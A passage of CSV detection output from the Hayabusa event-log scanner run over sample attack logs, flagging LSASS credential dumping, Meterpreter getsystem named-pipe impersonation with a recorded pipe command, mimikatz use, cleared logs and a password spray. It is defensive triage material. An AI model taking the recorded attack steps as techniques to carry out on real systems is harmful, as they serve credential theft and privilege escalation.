Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 
+09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 
+09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 
+09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:cspizor/bgreenwood/baker/dpendolino/melliott/cfleener/sarmstrong/sanson/lpesce/wstrzelec/drook/thessman/mtoussain/jorchilles/ssims/bhostetler/dmashburn/edygert/cmoody/tbennett/cdavis/zmathis/eskoudis/jleytevidal/jwright/bgalbraith/psmith/lschifano/celgee/kperryman/bking/cragoso/rbowes/jkulikowski/jlake/econrad/smisenar/mdouglas/gsalinas/Administrator/ebooth IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:17.922 